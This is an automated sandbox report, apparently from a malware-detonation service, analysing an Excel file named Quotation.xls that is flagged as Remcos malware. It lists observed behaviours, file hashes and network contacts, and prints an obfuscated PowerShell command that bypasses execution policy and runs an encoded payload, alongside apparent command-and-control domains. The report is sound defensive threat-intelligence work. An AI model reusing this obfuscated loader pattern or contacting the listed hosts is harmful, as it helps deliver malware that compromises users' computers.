Analysis Overview
SHA256
c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Threat Level: Known bad
The file Quotation.xls was found to be: Known bad.
Malicious Activity Summary
Remcos
Process spawned unexpected child process
Evasion via Device Credential Deployment
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Suspicious use of SetThreadContext
Detected phishing page
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Uses Volume Shadow Copy service COM API
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Checks processor information in registry
Analysis: static1
Detonation Overview
Reported
2024-07-24 10:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-24 10:30
Reported
2024-07-24 10:33
Platform
win7-20240704-en
Max time kernel
148s
Max time network
155s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1108 set thread context of 2884 | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe |
Detected phishing page
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"
C:\Users\Admin\AppData\Roaming\winiti.exe
"C:\Users\Admin\AppData\Roaming\winiti.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tny.wtf | udp |
| US | 172.67.156.72:80 | tny.wtf | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 172.67.156.72:80 | tny.wtf | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 107.173.143.46:80 | 107.173.143.46 | tcp |
| US | 8.8.8.8:53 | bossnacarpet.com | udp |
| US | 173.255.204.62:2556 | bossnacarpet.com | tcp |
| US | 8.8.8.8:53 | vegetachcnc.com | udp |
| US | 107.173.4.18:2556 | vegetachcnc.com | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta
| MD5 | 5c8152c47be9ca7a398a85d2e51b2505 |
| SHA1 | 34eeba07fe8667b81f14be825223b26006d7d042 |
| SHA256 | ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd |
| SHA512 | 8f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a |
\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline
| MD5 | b747cdd0ffea5c8ddf7131e17823747f |
| SHA1 | 41a278eddce8b4771d5b42be18cac33331d2d792 |
| SHA256 | d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf |
| SHA512 | 826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1 |
\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.0.cs
| MD5 | a83dc0e46bbad233951be9e3fdba130c |
| SHA1 | 892cfc6827bb1072ec2e26bbf83457497d6a17cb |
| SHA256 | aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967 |
| SHA512 | e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp
| MD5 | 03a5865dc15c5d0f43ced1aee7a8d16e |
| SHA1 | 81458a58ad5a09f87c5d7b15e4c02dd7a5166555 |
| SHA256 | be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f |
| SHA512 | a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428 |
C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp
| MD5 | 35c7d65fd3c27e01c9579b744902459c |
| SHA1 | 36491adf9dccab029e8da529632e88fe6d9fab55 |
| SHA256 | 7b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957 |
| SHA512 | 28cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a |
C:\Users\Admin\AppData\Local\Temp\wrr7nadr.dll
| MD5 | 930f55e4011c2193939d376948c305ad |
| SHA1 | 06464223e8a3f1074a858d66f5308c9115639691 |
| SHA256 | 077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec |
| SHA512 | e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1 |
C:\Users\Admin\AppData\Local\Temp\wrr7nadr.pdb
| MD5 | d861d056a5c35a467b54b45eec5b3f39 |
| SHA1 | e4e34e26d1800c8b57cffe70c8a3150c29c62162 |
| SHA256 | 5ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1 |
| SHA512 | 0fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4 |
C:\Users\Admin\AppData\Roaming\winiti.exe
| MD5 | f6bf8ada032d17192526ffebb48aed79 |
| SHA1 | 362cb802e430115288638c9d613f00412f1b2519 |
| SHA256 | 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d |
| SHA512 | 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-24 10:30
Reported
2024-07-24 10:33
Platform
win10v2004-20240709-en
Max time kernel
143s
Max time network
133s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Detected phishing page
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1628 wrote to memory of 3688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 1628 wrote to memory of 3688 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tny.wtf | udp |
| US | 104.21.40.183:80 | tny.wtf | tcp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 192.3.118.15:80 | 192.3.118.15 | tcp |
| US | 8.8.8.8:53 | 183.40.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.118.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 0e7ee9deb29b355cd65ec941d250191e |
| SHA1 | e9e0abd1e852a87b62599092ec99ff20e3baf211 |
| SHA256 | af21a14f64edb0dd0499a6b7e7c031d039f61438c78d742479d33f94e040fa81 |
| SHA512 | 9d0fa54e29a5c5db95cd21893420b6923618c949cf7dc6d4547ec718993dc70c84c8209c46dc14b2f55eceb81d8070b92db8229f277d16b457f3d078f91ad187 |